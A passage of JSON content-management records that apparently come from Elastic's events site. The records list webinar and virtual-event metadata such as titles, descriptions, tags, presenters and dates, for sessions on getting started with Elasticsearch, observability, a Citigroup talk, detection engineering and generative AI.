target=\"_blank\"\u003e2019-michelin-restaurants.csv\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cul\u003e\n \u003cli\u003e\u003ca href=\"https://info.elastic.co/rs/813-MAM-392/images/2019-michelin-resturants.txt\" target=\"_blank\"\u003e2019-michelin-restaurants.txt\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003eRead the \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/index.html\" target=\"_self\"\u003eElasticsearch documentation\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"/downloads/elasticsearch\" target=\"_self\"\u003eDownload Elasticsearch\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e","presentation_date":"2021-08-19T16:00:00.000Z","presenter":["blt59e7f7049d793705"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"Getting Started with Elasticsearch","seo_description_l10n":"Elasticsearch is an open-source distributed, RESTful search and analytics engine capable of solving a growing number of use cases.","seo_keywords_l10n":"elasticsearch, open source, getting started","seo_image":{"uid":"blt415c7141d8fb9943","created_by":"blt5280857d9e24912bc99a2478","updated_by":"blt5280857d9e24912bc99a2478","created_at":"2020-07-22T21:17:02.723Z","updated_at":"2020-07-22T21:17:02.723Z","content_type":"image/jpeg","file_size":"93520","filename":"elasticsearch_screenshot_-_facebook_ad.jpg","title":"elasticsearch_screenshot_-_facebook_ad.jpg","ACL":{},"_version":1,"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-07-22T21:17:22.269Z","user":"blt5280857d9e24912bc99a2478"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt415c7141d8fb9943/5f18accec0cdfc39bd77aa79/elasticsearch_screenshot_-_facebook_ad.jpg"},"noindex":false},"tags":["started","elasticsearch","video"],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"uid":"bltccf54d4afac13158","ACL":{},"_version":1,"created_at":"2020-11-13T00:06:52.343Z","created_by":"blt3044324473ef223b70bc674c","keyword":"americas","label_l10n":"Americas","locale":"en-us","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-12-24T13:12:41.684Z","user":"blt3e52848e0cb3c394"},"tags":[],"title":"Americas","updated_at":"2020-11-13T00:06:52.343Z","updated_by":"blt3044324473ef223b70bc674c"},{"_version":1,"locale":"en-us","uid":"bltf4c15a435ded5722","ACL":{},"created_at":"2021-04-13T17:54:31.202Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"europe","label_l10n":"Europe","tags":[],"title":"Europe","updated_at":"2021-04-13T17:54:31.202Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-10T12:13:00.412Z","user":"blt3e52848e0cb3c394"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[{"title":"Getting started","label_l10n":"Getting started","keyword":"getting-started","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt30953f4176054d3f","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:37:25.148Z","updated_at":"2020-06-17T03:37:25.148Z","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:37:25.148Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-01-07T18:03:25.028Z","user":"blt36e890d06c5ec32c"}}],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Elasticsearch: Getting Started","token":"91nYx5Xqs3UYb9","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-01-24T20:42:19.618Z","updated_by":"blt3044324473ef223b70bc674c","url":"/virtual-events/getting-started-elasticsearch","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"z2CTqBHyaoy2KaoGNzCqEk","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-01-24T20:42:24.319Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt901c8454e61647e4","_version":4,"locale":"en-us","ACL":{},"created_at":"2025-01-16T20:11:09.673Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Observability As A Service","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eAre you potentially leaving observability opportunities on the table? In this power hour, we'll understand how partners and resellers turn Elastic Observability into a service that they can offer to their customers.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003eHear from Elastic about how Elastic Observability can be offered as a service\u003c/li\u003e\u003cli\u003eLearn live from Elastic's partner, Expedient, and discover how they built an observability offering to their end-users\u003c/li\u003e\u003cli\u003eReduce costs of managing and maintaining infrastructure\u003c/li\u003e\u003c/ul\u003e","presentation_date":"2025-01-15T17:00:00.000Z","presenter":["blt273108e39bbf908e","blt5246870b4da11124"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Observability As A Service","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-01-21T15:23:45.429Z","updated_by":"blt3044324473ef223b70bc674c","url":"/virtual-events/observability-as-a-service","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"8THzioyVCbjngRv9yU7qPQ","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-01-21T21:38:11.291Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltf8bacf2bbe5645c9","_version":5,"locale":"en-us","ACL":{},"created_at":"2025-01-15T01:27:11.384Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"How Elastic is helping Citigroup with observability challenges in financial services","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":[],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eJoin Elastic's David Hope and Citigroup's Michael Johnson to hear about current observability challenges in FinServ and how Elastic has helped Citigroup overcome these hurdles.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003eCurrent observability challenges in financial services\u003c/li\u003e\u003cli\u003eHow Elastic helped overcome observability hurdles\u003c/li\u003e\u003cli\u003eThe importance of OpenTelemetry\u003c/li\u003e\u003cli\u003eThe observability data mesh with cross cluster search\u003c/li\u003e\u003cli\u003eFuture milestones for the successful implementation of generative AI\u003c/li\u003e\u003cli\u003eHow Elastic can help support future initiatives\u003c/li\u003e\u003c/ul\u003e\u003ch4\u003eWant to stay in the loop on all things Elastic?\u003c/h4\u003e\u003cp\u003e\u003ca href=\"/events?tab=1\" target=\"_self\"\u003eJoin us\u003c/a\u003e at our upcoming events or check out \u003ca href=\"/events/elasticon/archive\" target=\"_self\"\u003eElasticON's video archive\u003c/a\u003e.\u003c/p\u003e\u003cp\u003e\u003ca href=\"/community\" target=\"_self\"\u003eGet connected\u003c/a\u003e to find help from the Elastic community.\u003c/p\u003e","presentation_date":"2024-11-13T16:00:00.000Z","presenter":["bltd516a87082210f90","blt2faab086170635af"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":true},"tags":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt6f3b5313b04c2729","ACL":{},"created_at":"2023-11-06T21:49:22.691Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"customer-story","label_l10n":"Customer story","tags":[],"title":"Customer story","updated_at":"2023-11-06T21:49:22.691Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.115Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[{"_version":3,"locale":"en-us","uid":"blt1671c05cb4d5e1af","ACL":{},"created_at":"2020-06-17T03:41:39.784Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticon","label_l10n":"ElasticON","tags":[],"title":"ElasticON","updated_at":"2021-03-04T18:54:01.311Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-01-25T09:15:42.772Z","user":"blt3e52848e0cb3c394"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"uid":"bltccf54d4afac13158","ACL":{},"_version":1,"created_at":"2020-11-13T00:06:52.343Z","created_by":"blt3044324473ef223b70bc674c","keyword":"americas","label_l10n":"Americas","locale":"en-us","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-12-24T13:12:41.684Z","user":"blt3e52848e0cb3c394"},"tags":[],"title":"Americas","updated_at":"2020-11-13T00:06:52.343Z","updated_by":"blt3044324473ef223b70bc674c"},{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"bltdeb5e512cabf0e10","ACL":{},"created_at":"2023-11-03T17:34:50.549Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"platform","label_l10n":"Platform","tags":[],"title":"Platform","updated_at":"2023-11-03T17:34:53.443Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.235Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"ElasticON 2024/2025 - How Elastic is helping Citigroup with observability challenges in financial services","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-01-15T18:22:56.092Z","updated_by":"blt3044324473ef223b70bc674c","url":"/events/elasticon/archive/observability-problem-resolution","video_type":["blt0d07966d0c7cc2b8"],"vidyard":{"uuid":"iE71y1uAZdGoVbPuiNnZWq","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-01-15T18:37:14.261Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt9da0f651328887a0","_version":3,"locale":"en-us","ACL":{},"created_at":"2024-12-10T21:16:17.810Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Planning for 2025: Detection Engineering with the Elastic Global Threat Report","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eThe 2024 Elastic Global Threat Report provides a unique look at the threat landscape, but understanding leading threat trends is only the first step. Preparing your organization for what's coming can be a daunting task, but you can get ahead with effective detection engineering — and you don't need to be a mature SOC to achieve a robust detection engineering function…\u003c/p\u003e\u003cp\u003eThat's where Elastic Security Labs' detection engineers help you succeed. Whether it's discussing specific threat mechanisms or demonstrating how you can automate detection and response workflows, achieve your security goals with insights from our seasoned detection engineers. Join our virtual event to explore some of the basics of detection engineering, our experts' thoughts on this year's top threat trends and forecasts, and the power of Elastic Security in action!\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003eExplore major endpoint threat insights from the 2024 Elastic Global Threat Report per MITRE ATT\u0026amp;CK\u003c/li\u003e\u003cli\u003eExplain the basics of the Elastic Detection Engineering Behavior Maturity Model\u003c/li\u003e\u003cli\u003eSimulate attack response using Elastic Security, with the Common Unix Printing System (CUPS) vulnerability as an example\u003c/li\u003e\u003cli\u003eSync third party Endpoint Detection and Response (EDR) products into Elastic Security\u003c/li\u003e\u003cli\u003eHighlight detection engineering best practices like detections-as-code (DaC)\u003c/li\u003e\u003c/ul\u003e\u003ch4\u003eAdditional resources\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003ca href=\"/resources/security/report/global-threat-report\"\u003e2024 Elastic Global Threat Report\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/security-labs\"\u003eElastic Security Labs\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/security-labs/elastic-releases-debmm\"\u003eThe Detection Engineering Behavior Maturity Model (DEBMM)\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/security-labs/cups-overflow\"\u003eCUPS Overflow: When your printer spills more than ink\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/security-labs/dac-beta-release\"\u003eNow in beta: Detections-as-code\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e","presentation_date":"2025-01-14T17:00:00.000Z","presenter":["blt2e8b4b3b2dbfd83c","blt7493f00afa38931d"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"Detection Engineering with the Elastic Global Threat Report","seo_description_l10n":"Join our webinar to master detection engineering basics and enhance your organization's security with top threat trends identified in the Elastic Global Threat Report.","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"bltdabf9ea82c489dad","ACL":{},"created_at":"2023-06-27T17:09:23.025Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"india","label_l10n":"India","tags":[],"title":"India","updated_at":"2023-06-27T17:09:23.025Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-06-27T17:09:25.693Z","user":"blt36e890d06c5ec32c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Planning for 2025: Detection Engineering with the Elastic Global Threat Report","token":"7986881770","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-01-14T17:58:11.624Z","updated_by":"blt417fc94cb7c64d7d","url":"/virtual-events/detection-engineering-with-the-global-threat-report","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"WYJ6V67oVRYemDxyfuhqH3","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-01-14T17:58:16.028Z","user":"blt417fc94cb7c64d7d","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltbd5321a530d5b0c6","_version":2,"locale":"en-us","ACL":{},"created_at":"2025-01-10T21:26:13.124Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Solving business challenges with data and AI: Insights from 1,000+ C-Suite Leaders","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12248","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eHarnessing the power of data and AI is crucial to solving business challenges, driving innovation, and staying ahead of the competition. Despite significant investments in technology 7 in 10 C-suite executives still struggle to make real-time data-driven decisions in confidence.\u003c/p\u003e\u003cp\u003eIn this webinar, we will discuss the \u003cstrong\u003e5 key insights from 1000+ c-suite, business, and technology leaders\u003c/strong\u003e from our recent research study. Learn about your peer's top business challenges, data problems, and investment priorities (especially AI and generative AI) to see how you can get ahead. Discover why prioritising your data foundation is key to leveraging AI to drive business value.\u003c/p\u003e\u003ch4\u003eKey highlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003cstrong\u003eBusiness challenges:\u003c/strong\u003e Learn what challenges C-suite leaders across all industries face.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eData challenges:\u003c/strong\u003e Discover why 60% of leaders are unsatisfied with the data insights your company generates.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eData maturity:\u003c/strong\u003e See why 2 in 3 leaders are behind on data maturity and identify steps to enhance your capabilities.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eBusiness impact of data and AI:\u003c/strong\u003e 80% of C-suite executives believe using AI data-driven insights increases revenue. See how data and AI capabilities drive business value.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eGenAI and AI investments:\u003c/strong\u003e Hear from the 93% of executives already investing or planning to invest in generative AI.\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cstrong\u003eDon't miss out—attend the webinar to get the full insights!\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"/resources/portfolio/report/5-insights-csuite-leaders-data-ai\" target=\"_self\"\u003eRead the research report to learn more\u003c/a\u003e.\u003c/p\u003e","presentation_date":"2025-02-19T16:00:00.000Z","presenter":["blt14f762eec103604e"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Solving business challenges with data and AI: Insights from 1,000+ C-Suite Leaders","token":"","translated_date_l10n":"","translated_time_l10n":"11:00 a.m. EST","updated_at":"2025-01-14T17:47:09.540Z","updated_by":"blt3044324473ef223b70bc674c","url":"/virtual-events/ai-insights-from-thousand-executive-leaders","video_type":["blt321a8ac0bef65269"],"vidyard":{"uuid":"","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-01-23T15:00:19.246Z","user":"blt7ee4b4a4026b9c0b","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt6bcafd2e9d5c3727","_version":7,"locale":"en-us","ACL":{},"created_at":"2025-01-03T22:49:55.229Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"2025 technical trends: Embracing the era of choice to bring GenAI into production","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"16474","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":"\u003cp\u003eAMER: 9:00 a.m. PST, 12:00 p.m 